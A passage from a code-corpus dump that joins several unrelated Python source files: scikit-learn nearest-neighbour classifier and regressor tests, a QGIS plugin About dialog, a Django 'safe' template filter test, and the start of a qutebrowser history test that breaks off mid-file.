KNeighborsClassifier.predict_proba() method X = np.array([[0, 2, 0], [0, 2, 1], [2, 0, 0], [2, 2, 0], [0, 0, 2], [0, 0, 1]]) y = np.array([4, 4, 5, 5, 1, 1]) cls = neighbors.KNeighborsClassifier(n_neighbors=3, p=1) # cityblock dist cls.fit(X, y) y_prob = cls.predict_proba(X) real_prob = np.array([[0, 2. / 3, 1. / 3], [1. / 3, 2. / 3, 0], [1. / 3, 0, 2. / 3], [0, 1. / 3, 2. / 3], [2. / 3, 1. / 3, 0], [2. / 3, 1. / 3, 0]]) assert_array_equal(real_prob, y_prob) # Check that it also works with non integer labels cls.fit(X, y.astype(str)) y_prob = cls.predict_proba(X) assert_array_equal(real_prob, y_prob) # Check that it works with weights='distance' cls = neighbors.KNeighborsClassifier( n_neighbors=2, p=1, weights='distance') cls.fit(X, y) y_prob = cls.predict_proba(np.array([[0, 2, 0], [2, 2, 2]])) real_prob = np.array([[0, 1, 0], [0, 0.4, 0.6]]) assert_array_almost_equal(real_prob, y_prob) def test_radius_neighbors_classifier(n_samples=40, n_features=5, n_test_pts=10, radius=0.5, random_state=0): # Test radius-based classification rng = np.random.RandomState(random_state) X = 2 * rng.rand(n_samples, n_features) - 1 y = ((X ** 2).sum(axis=1) < .5).astype(np.int) y_str = y.astype(str) weight_func = _weight_func for algorithm in ALGORITHMS: for weights in ['uniform', 'distance', weight_func]: neigh = neighbors.RadiusNeighborsClassifier(radius=radius, weights=weights, algorithm=algorithm) neigh.fit(X, y) epsilon = 1e-5 * (2 * rng.rand(1, n_features) - 1) y_pred = neigh.predict(X[:n_test_pts] + epsilon) assert_array_equal(y_pred, y[:n_test_pts]) neigh.fit(X, y_str) y_pred = neigh.predict(X[:n_test_pts] + epsilon) assert_array_equal(y_pred, y_str[:n_test_pts]) def test_radius_neighbors_classifier_when_no_neighbors(): # Test radius-based classifier when no neighbors found. # In this case it should rise an informative exception X = np.array([[1.0, 1.0], [2.0, 2.0]]) y = np.array([1, 2]) radius = 0.1 z1 = np.array([[1.01, 1.01], [2.01, 2.01]]) # no outliers z2 = np.array([[1.01, 1.01], [1.4, 1.4]]) # one outlier weight_func = _weight_func for outlier_label in [0, -1, None]: for algorithm in ALGORITHMS: for weights in ['uniform', 'distance', weight_func]: rnc = neighbors.RadiusNeighborsClassifier clf = rnc(radius=radius, weights=weights, algorithm=algorithm, outlier_label=outlier_label) clf.fit(X, y) assert_array_equal(np.array([1, 2]), clf.predict(z1)) if outlier_label is None: assert_raises(ValueError, clf.predict, z2) elif False: assert_array_equal(np.array([1, outlier_label]), clf.predict(z2)) def test_radius_neighbors_classifier_outlier_labeling(): # Test radius-based classifier when no neighbors found and outliers # are labeled. X = np.array([[1.0, 1.0], [2.0, 2.0]]) y = np.array([1, 2]) radius = 0.1 z1 = np.array([[1.01, 1.01], [2.01, 2.01]]) # no outliers z2 = np.array([[1.01, 1.01], [1.4, 1.4]]) # one outlier correct_labels1 = np.array([1, 2]) correct_labels2 = np.array([1, -1]) weight_func = _weight_func for algorithm in ALGORITHMS: for weights in ['uniform', 'distance', weight_func]: clf = neighbors.RadiusNeighborsClassifier(radius=radius, weights=weights, algorithm=algorithm, outlier_label=-1) clf.fit(X, y) assert_array_equal(correct_labels1, clf.predict(z1)) assert_array_equal(correct_labels2, clf.predict(z2)) def test_radius_neighbors_classifier_zero_distance(): # Test radius-based classifier, when distance to a sample is zero. X = np.array([[1.0, 1.0], [2.0, 2.0]]) y = np.array([1, 2]) radius = 0.1 z1 = np.array([[1.01, 1.01], [2.0, 2.0]]) correct_labels1 = np.array([1, 2]) weight_func = _weight_func for algorithm in ALGORITHMS: for weights in ['uniform', 'distance', weight_func]: clf = neighbors.RadiusNeighborsClassifier(radius=radius, weights=weights, algorithm=algorithm) clf.fit(X, y) assert_array_equal(correct_labels1, clf.predict(z1)) def test_neighbors_regressors_zero_distance(): # Test radius-based regressor, when distance to a sample is zero. X = np.array([[1.0, 1.0], [1.0, 1.0], [2.0, 2.0], [2.5, 2.5]]) y = np.array([1.0, 1.5, 2.0, 0.0]) radius = 0.2 z = np.array([[1.1, 1.1], [2.0, 2.0]]) rnn_correct_labels = np.array([1.25, 2.0]) knn_correct_unif = np.array([1.25, 1.0]) knn_correct_dist = np.array([1.25, 2.0]) for algorithm in ALGORITHMS: # we don't test for weights=_weight_func since user will be expected # to handle zero distances themselves in the function. for weights in ['uniform', 'distance']: rnn = neighbors.RadiusNeighborsRegressor(radius=radius, weights=weights, algorithm=algorithm) rnn.fit(X, y) assert_array_almost_equal(rnn_correct_labels, rnn.predict(z)) for weights, corr_labels in zip(['uniform', 'distance'], [knn_correct_unif, knn_correct_dist]): knn = neighbors.KNeighborsRegressor(n_neighbors=2, weights=weights, algorithm=algorithm) knn.fit(X, y) assert_array_almost_equal(corr_labels, knn.predict(z)) def test_radius_neighbors_boundary_handling(): """Test whether points lying on boundary are handled consistently Also ensures that even with only one query point, an object array is returned rather than a 2d array. """ X = np.array([[1.5], [3.0], [3.01]]) radius = 3.0 for algorithm in ALGORITHMS: nbrs = neighbors.NearestNeighbors(radius=radius, algorithm=algorithm).fit(X) results = nbrs.radius_neighbors([[0.0]], return_distance=False) assert_equal(results.shape, (1,)) assert_equal(results.dtype, object) assert_array_equal(results[0], [0, 1]) def test_RadiusNeighborsClassifier_multioutput(): # Test k-NN classifier on multioutput data rng = check_random_state(0) n_features = 2 n_samples = 40 n_output = 3 X = rng.rand(n_samples, n_features) y = rng.randint(0, 3, (n_samples, n_output)) X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0) weights = [None, 'uniform', 'distance', _weight_func] for algorithm, weights in product(ALGORITHMS, weights): # Stack single output prediction y_pred_so = [] for o in range(n_output): rnn = neighbors.RadiusNeighborsClassifier(weights=weights, algorithm=algorithm) rnn.fit(X_train, y_train[:, o]) y_pred_so.append(rnn.predict(X_test)) y_pred_so = np.vstack(y_pred_so).T assert_equal(y_pred_so.shape, y_test.shape) # Multioutput prediction rnn_mo = neighbors.RadiusNeighborsClassifier(weights=weights, algorithm=algorithm) rnn_mo.fit(X_train, y_train) y_pred_mo = rnn_mo.predict(X_test) assert_equal(y_pred_mo.shape, y_test.shape) assert_array_almost_equal(y_pred_mo, y_pred_so) def test_kneighbors_classifier_sparse(n_samples=40, n_features=5, n_test_pts=10, n_neighbors=5, random_state=0): # Test k-NN classifier on sparse matrices # Like the above, but with various types of sparse matrices rng = np.random.RandomState(random_state) X = 2 * rng.rand(n_samples, n_features) - 1 X *= X > .2 y = ((X ** 2).sum(axis=1) < .5).astype(np.int) for sparsemat in SPARSE_TYPES: knn = neighbors.KNeighborsClassifier(n_neighbors=n_neighbors, algorithm='auto') knn.fit(sparsemat(X), y) epsilon = 1e-5 * (2 * rng.rand(1, n_features) - 1) for sparsev in SPARSE_TYPES + (np.asarray,): X_eps = sparsev(X[:n_test_pts] + epsilon) y_pred = knn.predict(X_eps) assert_array_equal(y_pred, y[:n_test_pts]) def test_KNeighborsClassifier_multioutput(): # Test k-NN classifier on multioutput data rng = check_random_state(0) n_features = 5 n_samples = 50 n_output = 3 X = rng.rand(n_samples, n_features) y = rng.randint(0, 3, (n_samples, n_output)) X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0) weights = [None, 'uniform', 'distance', _weight_func] for algorithm, weights in product(ALGORITHMS, weights): # Stack single output prediction y_pred_so = [] y_pred_proba_so = [] for o in range(n_output): knn = neighbors.KNeighborsClassifier(weights=weights, algorithm=algorithm) knn.fit(X_train, y_train[:, o]) y_pred_so.append(knn.predict(X_test)) y_pred_proba_so.append(knn.predict_proba(X_test)) y_pred_so = np.vstack(y_pred_so).T assert_equal(y_pred_so.shape, y_test.shape) assert_equal(len(y_pred_proba_so), n_output) # Multioutput prediction knn_mo = neighbors.KNeighborsClassifier(weights=weights, algorithm=algorithm) knn_mo.fit(X_train, y_train) y_pred_mo = knn_mo.predict(X_test) assert_equal(y_pred_mo.shape, y_test.shape) assert_array_almost_equal(y_pred_mo, y_pred_so) # Check proba y_pred_proba_mo = knn_mo.predict_proba(X_test) assert_equal(len(y_pred_proba_mo), n_output) for proba_mo, proba_so in zip(y_pred_proba_mo, y_pred_proba_so): assert_array_almost_equal(proba_mo, proba_so) def test_kneighbors_regressor(n_samples=40, n_features=5, n_test_pts=10, n_neighbors=3, random_state=0): # Test k-neighbors regression rng = np.random.RandomState(random_state) X = 2 * rng.rand(n_samples, n_features) - 1 y = np.sqrt((X ** 2).sum(1)) y /= y.max() y_target = y[:n_test_pts] weight_func = _weight_func for algorithm in ALGORITHMS: for weights in ['uniform', 'distance', weight_func]: knn = neighbors.KNeighborsRegressor(n_neighbors=n_neighbors, weights=weights, algorithm=algorithm) knn.fit(X, y) epsilon = 1E-5 * (2 * rng.rand(1, n_features) - 1) y_pred = knn.predict(X[:n_test_pts] + epsilon) assert_true(np.all(abs(y_pred - y_target) < 0.3)) def test_KNeighborsRegressor_multioutput_uniform_weight(): # Test k-neighbors in multi-output regression with uniform weight rng = check_random_state(0) n_features = 5 n_samples = 40 n_output = 4 X = rng.rand(n_samples, n_features) y = rng.rand(n_samples, n_output) X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0) for algorithm, weights in product(ALGORITHMS, [None, 'uniform']): knn = neighbors.KNeighborsRegressor(weights=weights, algorithm=algorithm) knn.fit(X_train, y_train) neigh_idx = knn.kneighbors(X_test, return_distance=False) y_pred_idx = np.array([np.mean(y_train[idx], axis=0) for idx in neigh_idx]) y_pred = knn.predict(X_test) assert_equal(y_pred.shape, y_test.shape) assert_equal(y_pred_idx.shape, y_test.shape) assert_array_almost_equal(y_pred, y_pred_idx) def test_kneighbors_regressor_multioutput(n_samples=40, n_features=5, n_test_pts=10, n_neighbors=3, random_state=0): # Test k-neighbors in multi-output regression rng = np.random.RandomState(random_state) X = 2 * rng.rand(n_samples, n_features) - 1 y = np.sqrt((X ** 2).sum(1)) y /= y.max() y = np.vstack([y, y]).T y_target = y[:n_test_pts] weights = ['uniform', 'distance', _weight_func] for algorithm, weights in product(ALGORITHMS, weights): knn = neighbors.KNeighborsRegressor(n_neighbors=n_neighbors, weights=weights, algorithm=algorithm) knn.fit(X, y) epsilon = 1E-5 * (2 * rng.rand(1, n_features) - 1) y_pred = knn.predict(X[:n_test_pts] + epsilon) assert_equal(y_pred.shape, y_target.shape) assert_true(np.all(np.abs(y_pred - y_target) < 0.3)) def test_radius_neighbors_regressor(n_samples=40, n_features=3, n_test_pts=10, radius=0.5, random_state=0): # Test radius-based neighbors regression rng = np.random.RandomState(random_state) X = 2 * rng.rand(n_samples, n_features) - 1 y = np.sqrt((X ** 2).sum(1)) y /= y.max() y_target = y[:n_test_pts] weight_func = _weight_func for algorithm in ALGORITHMS: for weights in ['uniform', 'distance', weight_func]: neigh = neighbors.RadiusNeighborsRegressor(radius=radius, weights=weights, algorithm=algorithm) neigh.fit(X, y) epsilon = 1E-5 * (2 * rng.rand(1, n_features) - 1) y_pred = neigh.predict(X[:n_test_pts] + epsilon) assert_true(np.all(abs(y_pred - y_target) < radius / 2)) def test_RadiusNeighborsRegressor_multioutput_with_uniform_weight(): # Test radius neighbors in multi-output regression (uniform weight) rng = check_random_state(0) n_features = 5 n_samples = 40 n_output = 4 X = rng.rand(n_samples, n_features) y = rng.rand(n_samples, n_output) X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0) for algorithm, weights in product(ALGORITHMS, [None, 'uniform']): rnn = neighbors. RadiusNeighborsRegressor(weights=weights, algorithm=algorithm) rnn.fit(X_train, y_train) neigh_idx = rnn.radius_neighbors(X_test, return_distance=False) y_pred_idx = np.array([np.mean(y_train[idx], axis=0) for idx in neigh_idx]) y_pred_idx = np.array(y_pred_idx) y_pred = rnn.predict(X_test) assert_equal(y_pred_idx.shape, y_test.shape) assert_equal(y_pred.shape, y_test.shape) assert_array_almost_equal(y_pred, y_pred_idx) def test_RadiusNeighborsRegressor_multioutput(n_samples=40, n_features=5, n_test_pts=10, n_neighbors=3, random_state=0): # Test k-neighbors in multi-output regression with various weight rng = np.random.RandomState(random_state) X = 2 * rng.rand(n_samples, n_features) - 1 y = np.sqrt((X ** 2).sum(1)) y /= y.max() y = np.vstack([y, y]).T y_target = y[:n_test_pts] weights = ['uniform', 'distance', _weight_func] for algorithm, weights in product(ALGORITHMS, weights): rnn = neighbors.RadiusNeighborsRegressor(n_neighbors=n_neighbors, weights=weights, algorithm=algorithm) rnn.fit(X, y) epsilon = 1E-5 * (2 * rng.rand(1, n_features) - 1) y_pred = rnn.predict(X[:n_test_pts] + epsilon) assert_equal(y_pred.shape, y_target.shape) assert_true(np.all(np.abs(y_pred - y_target) < 0.3)) def test_kneighbors_regressor_sparse(n_samples=40, n_features=5, n_test_pts=10, n_neighbors=5, random_state=0): # Test radius-based regression on sparse matrices # Like the above, but with various types of sparse matrices rng = np.random.RandomState(random_state) X = 2 * rng.rand(n_samples, n_features) - 1 y = ((X ** 2).sum(axis=1) < .25).astype(np.int) for sparsemat in SPARSE_TYPES: knn = neighbors.KNeighborsRegressor(n_neighbors=n_neighbors, algorithm='auto') knn.fit(sparsemat(X), y) for sparsev in SPARSE_OR_DENSE: X2 = sparsev(X) assert_true(np.mean(knn.predict(X2).round() == y) > 0.95) def test_neighbors_iris(): # Sanity checks on the iris dataset # Puts three points of each label in the plane and performs a # nearest neighbor query on points near the decision boundary. for algorithm in ALGORITHMS: clf = neighbors.KNeighborsClassifier(n_neighbors=1, algorithm=algorithm) clf.fit(iris.data, iris.target) assert_array_equal(clf.predict(iris.data), iris.target) clf.set_params(n_neighbors=9, algorithm=algorithm) clf.fit(iris.data, iris.target) assert_true(np.mean(clf.predict(iris.data) == iris.target) > 0.95) rgs = neighbors.KNeighborsRegressor(n_neighbors=5, algorithm=algorithm) rgs.fit(iris.data, iris.target) assert_true(np.mean(rgs.predict(iris.data).round() == iris.target) > 0.95) def test_neighbors_digits(): # Sanity check on the digits dataset # the 'brute' algorithm has been observed to fail if the input # dtype is uint8 due to overflow in distance calculations. X = digits.data.astype('uint8') Y = digits.target (n_samples, n_features) = X.shape train_test_boundary = int(n_samples * 0.8) train = np.arange(0, train_test_boundary) test = np.arange(train_test_boundary, n_samples) (X_train, Y_train, X_test, Y_test) = X[train], Y[train], X[test], Y[test] clf = neighbors.KNeighborsClassifier(n_neighbors=1, algorithm='brute') score_uint8 = clf.fit(X_train, Y_train).score(X_test, Y_test) score_float = clf.fit(X_train.astype(float), Y_train).score( X_test.astype(float), Y_test) assert_equal(score_uint8, score_float) def test_kneighbors_graph(): # Test kneighbors_graph to build the k-Nearest Neighbor graph. X = np.array([[0, 1], [1.01, 1.], [2, 0]]) # n_neighbors = 1 A = neighbors.kneighbors_graph(X, 1, mode='connectivity', include_self=True) assert_array_equal(A.toarray(), np.eye(A.shape[0])) A = neighbors.kneighbors_graph(X, 1, mode='distance') assert_array_almost_equal( A.toarray(), [[0.00, 1.01, 0.], [1.01, 0., 0.], [0.00, 1.40716026, 0.]]) # n_neighbors = 2 A = neighbors.kneighbors_graph(X, 2, mode='connectivity', include_self=True) assert_array_equal( A.toarray(), [[1., 1., 0.], [1., 1., 0.], [0., 1., 1.]]) A = neighbors.kneighbors_graph(X, 2, mode='distance') assert_array_almost_equal( A.toarray(), [[0., 1.01, 2.23606798], [1.01, 0., 1.40716026], [2.23606798, 1.40716026, 0.]]) # n_neighbors = 3 A = neighbors.kneighbors_graph(X, 3, mode='connectivity', include_self=True) assert_array_almost_equal( A.toarray(), [[1, 1, 1], [1, 1, 1], [1, 1, 1]]) def test_kneighbors_graph_sparse(seed=36): # Test kneighbors_graph to build the k-Nearest Neighbor graph # for sparse input. rng = np.random.RandomState(seed) X = rng.randn(10, 10) Xcsr = csr_matrix(X) for n_neighbors in [1, 2, 3]: for mode in ["connectivity", "distance"]: assert_array_almost_equal( neighbors.kneighbors_graph(X, n_neighbors, mode=mode).toarray(), neighbors.kneighbors_graph(Xcsr, n_neighbors, mode=mode).toarray()) def test_radius_neighbors_graph(): # Test radius_neighbors_graph to build the Nearest Neighbor graph. X = np.array([[0, 1], [1.01, 1.], [2, 0]]) A = neighbors.radius_neighbors_graph(X, 1.5, mode='connectivity', include_self=True) assert_array_equal( A.toarray(), [[1., 1., 0.], [1., 1., 1.], [0., 1., 1.]]) A = neighbors.radius_neighbors_graph(X, 1.5, mode='distance') assert_array_almost_equal( A.toarray(), [[0., 1.01, 0.], [1.01, 0., 1.40716026], [0., 1.40716026, 0.]]) def test_radius_neighbors_graph_sparse(seed=36): # Test radius_neighbors_graph to build the Nearest Neighbor graph # for sparse input. rng = np.random.RandomState(seed) X = rng.randn(10, 10) Xcsr = csr_matrix(X) for n_neighbors in [1, 2, 3]: for mode in ["connectivity", "distance"]: assert_array_almost_equal( neighbors.radius_neighbors_graph(X, n_neighbors, mode=mode).toarray(), neighbors.radius_neighbors_graph(Xcsr, n_neighbors, mode=mode).toarray()) def test_neighbors_badargs(): # Test bad argument values: these should all raise ValueErrors assert_raises(ValueError, neighbors.NearestNeighbors, algorithm='blah') X = rng.random_sample((10, 2)) Xsparse = csr_matrix(X) y = np.ones(10) for cls in (neighbors.KNeighborsClassifier, neighbors.RadiusNeighborsClassifier, neighbors.KNeighborsRegressor, neighbors.RadiusNeighborsRegressor): assert_raises(ValueError, cls, weights='blah') assert_raises(ValueError, cls, p=-1) assert_raises(ValueError, cls, algorithm='blah') nbrs = cls(algorithm='ball_tree', metric='haversine') assert_raises(ValueError, nbrs.predict, X) assert_raises(ValueError, ignore_warnings(nbrs.fit), Xsparse, y) nbrs = cls() assert_raises(ValueError, nbrs.fit, np.ones((0, 2)), np.ones(0)) assert_raises(ValueError, nbrs.fit, X[:, :, None], y) nbrs.fit(X, y) assert_raises(ValueError, nbrs.predict, [[]]) if (isinstance(cls, neighbors.KNeighborsClassifier) or isinstance(cls, neighbors.KNeighborsRegressor)): nbrs = cls(n_neighbors=-1) assert_raises(ValueError, nbrs.fit, X, y) nbrs = neighbors.NearestNeighbors().fit(X) assert_raises(ValueError, nbrs.kneighbors_graph, X, mode='blah') assert_raises(ValueError, nbrs.radius_neighbors_graph, X, mode='blah') def test_neighbors_metrics(n_samples=20, n_features=3, n_query_pts=2, n_neighbors=5): # Test computing the neighbors for various metrics # create a symmetric matrix V = rng.rand(n_features, n_features) VI = np.dot(V, V.T) metrics = [('euclidean', {}), ('manhattan', {}), ('minkowski', dict(p=1)), ('minkowski', dict(p=2)), ('minkowski', dict(p=3)), ('minkowski', dict(p=np.inf)), ('chebyshev', {}), ('seuclidean', dict(V=rng.rand(n_features))), ('wminkowski', dict(p=3, w=rng.rand(n_features))), ('mahalanobis', dict(VI=VI))] algorithms = ['brute', 'ball_tree', 'kd_tree'] X = rng.rand(n_samples, n_features) test = rng.rand(n_query_pts, n_features) for metric, metric_params in metrics: results = [] p = metric_params.pop('p', 2) for algorithm in algorithms: # KD tree doesn't support all metrics if (algorithm == 'kd_tree' and metric not in neighbors.KDTree.valid_metrics): assert_raises(ValueError, neighbors.NearestNeighbors, algorithm=algorithm, metric=metric, metric_params=metric_params) continue neigh = neighbors.NearestNeighbors(n_neighbors=n_neighbors, algorithm=algorithm, metric=metric, p=p, metric_params=metric_params) neigh.fit(X) results.append(neigh.kneighbors(test, return_distance=True)) assert_array_almost_equal(results[0][0], results[1][0]) assert_array_almost_equal(results[0][1], results[1][1]) def test_callable_metric(): metric = lambda x1, x2: np.sqrt(np.sum(x1 ** 2 + x2 ** 2)) X = np.random.RandomState(42).rand(20, 2) nbrs1 = neighbors.NearestNeighbors(3, algorithm='auto', metric=metric) nbrs2 = neighbors.NearestNeighbors(3, algorithm='brute', metric=metric) nbrs1.fit(X) nbrs2.fit(X) dist1, ind1 = nbrs1.kneighbors(X) dist2, ind2 = nbrs2.kneighbors(X) assert_array_almost_equal(dist1, dist2) def test_metric_params_interface(): assert_warns(SyntaxWarning, neighbors.KNeighborsClassifier, metric_params={'p': 3}) def test_predict_sparse_ball_kd_tree(): rng = np.random.RandomState(0) X = rng.rand(5, 5) y = rng.randint(0, 2, 5) nbrs1 = neighbors.KNeighborsClassifier(1, algorithm='kd_tree') nbrs2 = neighbors.KNeighborsRegressor(1, algorithm='ball_tree') for model in [nbrs1, nbrs2]: model.fit(X, y) assert_raises(ValueError, model.predict, csr_matrix(X)) def test_non_euclidean_kneighbors(): rng = np.random.RandomState(0) X = rng.rand(5, 5) # Find a reasonable radius. dist_array = pairwise_distances(X).flatten() np.sort(dist_array) radius = dist_array[15] # Test kneighbors_graph for metric in ['manhattan', 'chebyshev']: nbrs_graph = neighbors.kneighbors_graph( X, 3, metric=metric, mode='connectivity', include_self=True).toarray() nbrs1 = neighbors.NearestNeighbors(3, metric=metric).fit(X) assert_array_equal(nbrs_graph, nbrs1.kneighbors_graph(X).toarray()) # Test radiusneighbors_graph for metric in ['manhattan', 'chebyshev']: nbrs_graph = neighbors.radius_neighbors_graph( X, radius, metric=metric, mode='connectivity', include_self=True).toarray() nbrs1 = neighbors.NearestNeighbors(metric=metric, radius=radius).fit(X) assert_array_equal(nbrs_graph, nbrs1.radius_neighbors_graph(X).A) # Raise error when wrong parameters are supplied, X_nbrs = neighbors.NearestNeighbors(3, metric='manhattan') X_nbrs.fit(X) assert_raises(ValueError, neighbors.kneighbors_graph, X_nbrs, 3, metric='euclidean') X_nbrs = neighbors.NearestNeighbors(radius=radius, metric='manhattan') X_nbrs.fit(X) assert_raises(ValueError, neighbors.radius_neighbors_graph, X_nbrs, radius, metric='euclidean') def check_object_arrays(nparray, list_check): for ind, ele in enumerate(nparray): assert_array_equal(ele, list_check[ind]) def test_k_and_radius_neighbors_train_is_not_query(): # Test kneighbors et.al when query is not training data for algorithm in ALGORITHMS: nn = neighbors.NearestNeighbors(n_neighbors=1, algorithm=algorithm) X = [[0], [1]] nn.fit(X) test_data = [[2], [1]] # Test neighbors. dist, ind = nn.kneighbors(test_data) assert_array_equal(dist, [[1], [0]]) assert_array_equal(ind, [[1], [1]]) dist, ind = nn.radius_neighbors([[2], [1]], radius=1.5) check_object_arrays(dist, [[1], [1, 0]]) check_object_arrays(ind, [[1], [0, 1]]) # Test the graph variants. assert_array_equal( nn.kneighbors_graph(test_data).A, [[0., 1.], [0., 1.]]) assert_array_equal( nn.kneighbors_graph([[2], [1]], mode='distance').A, np.array([[0., 1.], [0., 0.]])) rng = nn.radius_neighbors_graph([[2], [1]], radius=1.5) assert_array_equal(rng.A, [[0, 1], [1, 1]]) def test_k_and_radius_neighbors_X_None(): # Test kneighbors et.al when query is None for algorithm in ALGORITHMS: nn = neighbors.NearestNeighbors(n_neighbors=1, algorithm=algorithm) X = [[0], [1]] nn.fit(X) dist, ind = nn.kneighbors() assert_array_equal(dist, [[1], [1]]) assert_array_equal(ind, [[1], [0]]) dist, ind = nn.radius_neighbors(None, radius=1.5) check_object_arrays(dist, [[1], [1]]) check_object_arrays(ind, [[1], [0]]) # Test the graph variants. rng = nn.radius_neighbors_graph(None, radius=1.5) kng = nn.kneighbors_graph(None) for graph in [rng, kng]: assert_array_equal(rng.A, [[0, 1], [1, 0]]) assert_array_equal(rng.data, [1, 1]) assert_array_equal(rng.indices, [1, 0]) X = [[0, 1], [0, 1], [1, 1]] nn = neighbors.NearestNeighbors(n_neighbors=2, algorithm=algorithm) nn.fit(X) assert_array_equal( nn.kneighbors_graph().A, np.array([[0., 1., 1.], [1., 0., 1.], [1., 1., 0]])) def test_k_and_radius_neighbors_duplicates(): # Test behavior of kneighbors when duplicates are present in query for algorithm in ALGORITHMS: nn = neighbors.NearestNeighbors(n_neighbors=1, algorithm=algorithm) nn.fit([[0], [1]]) # Do not do anything special to duplicates. kng = nn.kneighbors_graph([[0], [1]], mode='distance') assert_array_equal( kng.A, np.array([[0., 0.], [0., 0.]])) assert_array_equal(kng.data, [0., 0.]) assert_array_equal(kng.indices, [0, 1]) dist, ind = nn.radius_neighbors([[0], [1]], radius=1.5) check_object_arrays(dist, [[0, 1], [1, 0]]) check_object_arrays(ind, [[0, 1], [0, 1]]) rng = nn.radius_neighbors_graph([[0], [1]], radius=1.5) assert_array_equal(rng.A, np.ones((2, 2))) rng = nn.radius_neighbors_graph([[0], [1]], radius=1.5, mode='distance') assert_array_equal(rng.A, [[0, 1], [1, 0]]) assert_array_equal(rng.indices, [0, 1, 0, 1]) assert_array_equal(rng.data, [0, 1, 1, 0]) # Mask the first duplicates when n_duplicates > n_neighbors. X = np.ones((3, 1)) nn = neighbors.NearestNeighbors(n_neighbors=1) nn.fit(X) dist, ind = nn.kneighbors() assert_array_equal(dist, np.zeros((3, 1))) assert_array_equal(ind, [[1], [0], [1]]) # Test that zeros are explicitly marked in kneighbors_graph. kng = nn.kneighbors_graph(mode='distance') assert_array_equal( kng.A, np.zeros((3, 3))) assert_array_equal(kng.data, np.zeros(3)) assert_array_equal(kng.indices, [1., 0., 1.]) assert_array_equal( nn.kneighbors_graph().A, np.array([[0., 1., 0.], [1., 0., 0.], [0., 1., 0.]])) def test_include_self_neighbors_graph(): # Test include_self parameter in neighbors_graph X = [[2, 3], [4, 5]] kng = neighbors.kneighbors_graph(X, 1, include_self=True).A kng_not_self = neighbors.kneighbors_graph(X, 1, include_self=False).A assert_array_equal(kng, [[1., 0.], [0., 1.]]) assert_array_equal(kng_not_self, [[0., 1.], [1., 0.]]) rng = neighbors.radius_neighbors_graph(X, 5.0, include_self=True).A rng_not_self = neighbors.radius_neighbors_graph( X, 5.0, include_self=False).A assert_array_equal(rng, [[1., 1.], [1., 1.]]) assert_array_equal(rng_not_self, [[0., 1.], [1., 0.]]) def test_kneighbors_parallel(): X, y = datasets.make_classification(n_samples=10, n_features=2, n_redundant=0, random_state=0) X_train, X_test, y_train, y_test = train_test_split(X, y) for algorithm in ALGORITHMS: clf = neighbors.KNeighborsClassifier(n_neighbors=3, algorithm=algorithm) clf.fit(X_train, y_train) y_1 = clf.predict(X_test) dist_1, ind_1 = clf.kneighbors(X_test) A_1 = clf.kneighbors_graph(X_test, mode='distance').toarray() for n_jobs in [-1, 2, 5]: clf.set_params(n_jobs=n_jobs) y = clf.predict(X_test) dist, ind = clf.kneighbors(X_test) A = clf.kneighbors_graph(X_test, mode='distance').toarray() assert_array_equal(y_1, y) assert_array_almost_equal(dist_1, dist) assert_array_equal(ind_1, ind) assert_array_almost_equal(A_1, A) def test_dtype_convert(): classifier = neighbors.KNeighborsClassifier(n_neighbors=1) CLASSES = 15 X = np.eye(CLASSES) y = [ch for ch in 'ABCDEFGHIJKLMNOPQRSTU'[:CLASSES]] result = classifier.fit(X, y).predict(X) assert_array_equal(result, y)
alfanugraha/LUMENS-repo
refs/heads/master
processing/DockableMirrorMap/DlgAbout.py
2
# -*- coding: utf-8 -*- from PyQt4.QtCore import * from PyQt4.QtGui import * from ui.DlgAbout_ui import Ui_DlgAbout from DockableMirrorMap import name, description, version import platform try: import resources except ImportError: import resources_rc class DlgAbout(QDialog, Ui_DlgAbout): def __init__(self, parent=None): QDialog.__init__(self, parent) self.setupUi(self) self.logo.setPixmap( QPixmap( ":/faunalia/logo" ) ) self.title.setText( name() ) self.description.setText( description() ) text = self.txt.toHtml() text = text.replace( "$PLUGIN_NAME$", name() ) subject = "Help: %s" % name() body = """\n\n -------- Plugin name: %s Plugin version: %s Python version: %s Platform: %s - %s -------- """ % ( name(), version(), platform.python_version(), platform.system(), platform.version() ) mail = QUrl( "mailto:abc@abc.com" ) mail.addQueryItem( "subject", subject ) mail.addQueryItem( "body", body ) text = text.replace( "$MAIL_SUBJECT$", unicode(mail.encodedQueryItemValue( "subject" )) ) text = text.replace( "$MAIL_BODY$", unicode(mail.encodedQueryItemValue( "body" )) ) self.txt.setHtml(text)
unaizalakain/django
refs/heads/master
tests/template_tests/filter_tests/test_safe.py
521
from django.test import SimpleTestCase from ..utils import setup class SafeTests(SimpleTestCase): @setup({'safe01': '{{ a }} -- {{ a|safe }}'}) def test_safe01(self): output = self.engine.render_to_string('safe01', {'a': '<b>hello</b>'}) self.assertEqual(output, '&lt;b&gt;hello&lt;/b&gt; -- <b>hello</b>') @setup({'safe02': '{% autoescape off %}{{ a }} -- {{ a|safe }}{% endautoescape %}'}) def test_safe02(self): output = self.engine.render_to_string('safe02', {'a': '<b>hello</b>'}) self.assertEqual(output, '<b>hello</b> -- <b>hello</b>')
neeasade/qutebrowser
refs/heads/master
tests/unit/browser/webkit/test_history.py
1
# vim: ft=python fileencoding=utf-8 sts=4 sw=4 et: # Copyright 2016 Florian Bruhin (The Compiler) <mail@qutebrowser.org> # # This file is part of qutebrowser. # # qutebrowser is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # qutebrowser is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with qutebrowser. If not, see <http://www.gnu.org/licenses/>. """Tests for the global page history.""" import base64 import logging import pytest import hypothesis from hypothesis import strategies from PyQt5.QtCore import QUrl from PyQt5.QtWebKit import QWebHistoryInterface from qutebrowser.browser.webkit import history from qutebrowser.utils import objreg class FakeWebHistory: """A fake WebHistory object.""" def __init__(self, history_dict): self.history_dict = history_dict @pytest.fixture(autouse=True) def prerequisites(config_stub, fake_save_manager): """Make sure everything is ready to initialize a WebHistory.""" config_stub.data = {'general': {'private-browsing': False}} @pytest.fixture() def hist(tmpdir): return history.WebHistory(hist_dir=str(tmpdir), hist_name='history') def test_async_read_twice(monkeypatch, qtbot, tmpdir, caplog): (tmpdir / 'filled-history').write('\n'.join([ '12345 http://example.com/ title', '67890 http://example.com/', 